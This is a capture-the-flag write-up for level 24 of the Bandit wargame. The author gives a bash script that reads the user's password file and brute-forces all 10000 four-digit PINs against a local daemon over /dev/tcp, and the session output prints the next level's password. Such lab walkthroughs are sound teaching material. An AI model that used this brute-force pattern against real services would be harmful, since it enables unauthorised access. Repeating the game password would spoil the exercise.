Level 24¶
Log in to the server with bandit24 and the password.
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
This one took me a long time because I was having issues with timeouts for some reason. I opted to use bash's native TCP capabilities and wrote a script that would send all possible password and pin combinations, and then print all the responses, which could be filtered easily.
#!/bin/bash IFS= exec 4<>/dev/tcp/localhost/30002 read -r -u4 line echo $line pass=$(< /etc/bandit_pass/$(whoami)) for pin in {0000..9999}; do echo $pass $pin >&4 done for pin in {0000..9999}; do read -u4 line echo $line done
Then it was a simple matter of executing this script with uniq to get at the password.
bandit24@bandit:/tmp/234hktj3l4224k3jh$ bash test.sh | uniq I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space. Wrong! Please enter the correct pincode. Try again. Correct! The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG Exiting. bandit24@bandit:/tmp/234hktj3l4224k3jh$